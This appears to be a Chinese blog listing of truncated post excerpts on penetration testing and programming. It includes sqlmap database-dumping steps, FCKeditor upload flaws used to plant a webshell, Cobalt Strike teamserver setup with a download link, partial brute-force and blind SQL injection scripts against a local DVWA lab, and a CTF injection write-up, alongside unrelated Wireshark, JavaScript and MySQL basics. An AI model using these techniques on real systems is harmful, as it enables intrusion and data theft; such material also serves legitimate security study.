常规注入步骤第一步注入点-u "url" 判断是否是注入点 有就判断用户的权限第二步获取数据库 所有的 -u "url" --dbs第三步 查看应用程序所有数据库 当前注入点所连接的数据库-u "url" --current-db /-user 获取用户名 用户名一般 root/sa 都是最高权限第四步 指定数据库列出所有表-u "url" --table -D "数据库名"第五步 读取指定表的字段名称-u…
fck 现在存在漏洞的本版分别是 2.4.2 ,2.4.4,2.6.6 可以在 查看版本 2.4.2 在 图片域有上传点 2.4.4 这里有几个按钮,首先是 Get Folders and Files(获取当前文件夹和文件),点击后,可以看到当前的文件信息:其次是Create Folder(创建目录),我们可以通过Create Folder来新建文件夹.点击”浏览”,这里可以选择要上传的文件,例如上传木马(yijuhua.jpg),然后点击Upload(上传)按钮,即可完成上传. 例外一处上传点…
链接:https://pan.baidu.com/s/1qstCSM9nO95tFGBsnYFYZw 提取码:w6ih  上面是工具 需要java jdk 在1.8.5 以上  实验环境windows 在K8_CS_3.12\cobaltstrike  目录下允许cmd  在cmd 执行 TeamServer.exe 192.168.11.247 你的密码 回车 点击CobaltStrike.exe(win) 添加监听列表 步骤 cobalt strike-->listeners-->add…
import sys import requests from requests.auth import HTTPBasicAuth def Brute_Force_Web(postData): res = requests.post('http://127.0.0.1/vulnerabilities/burtforce/bf_form.php', data=postData) //使用requests库进行post发包 if "success" in res.text: //检查网页…
import requests import string #mysql 手动注入 通用脚本 适用盲注 可以跟具自己的需求更改 def home(): url="url" list=string.digits+string.letters+"!@#$%^&*()_+{}-=<>,./?" s=requests.session() success = "" # 成功返回的特征 error="" #失败返回的体…
先扫后台发现 两个可疑登录界面 l0gin.php login.php 猜测是第一个 用bp 抓包发现 index.php 中间有302 重定向 头文件 里面有一个 page=l0gin.php 应该是他了 暗示的很明确了 显示 1 flag 先手动把 习惯手动sql注入 先判断 是数字型还是字符型 1' %23 看出不来 直接 union select 1,2 %23 ok 2被截断了 说明,存在被截断 而且直接是输出了字符串 猜测字符型 竟然 , 不能用 可以join 连接select un…
wireshark:Beyond Compare是一个网络封包分析软件.网络封包分析软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料.Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换,是目前全世界最广泛的网络封包分析软件 了解TCP端口 TCP的全称是Transmission Control Protocol,即传输控制协议.它在RFC 793中被定义.所有TCP通信都会使用源端口和目的端口,这些信息可以在每个TCP数据包的头部找到.而为了能够将数据传输到远…
解决方法: 实际上是因为没安装就开启了msf,用下面三个命令就解决了 sudo apt-get updatesudo apt-get install metasploit-frameworkmsfconsole…
一.变量 ECMAscript变量是松散型变量,所谓松散型变量,就是变量名称可以保存任何类型的数据,每个变量仅仅是一个用于保存值的占位符. 定义变量时要使用var操作符 如: var message; /*定义一个名为message的变量,该变量可以用来保存任何值,未初始化的变*量会保存一个特殊的值-undefined */ 二.局部变量 可以声明变量里同时初始化 function test(){ var message='hello'; //定义局部message变量,并初始值为hello a…
经过上两节的洗礼,我们能够连接上服务器,并成功地进入与mysql交互的会话中了.那么现在就可以发起SQL语句,让服务器来执行它了!这听起来很酷吧?接下来,我们开始学习MySQL的相关知识. 本文概览: (一)MySQL体系结构术语 (二)执行SQL语句和清除已输入的SQL语句 (三)数据库术语 (四)创建数据库.表 (一)MySQL体系结构术语 在学习语法前呢,我们还是要先明确一下MySQL中的一些术语.这将能起到自然过渡的作用. 实际上,当我们在使用MySQL时,显然会用到至少两个程序).原因…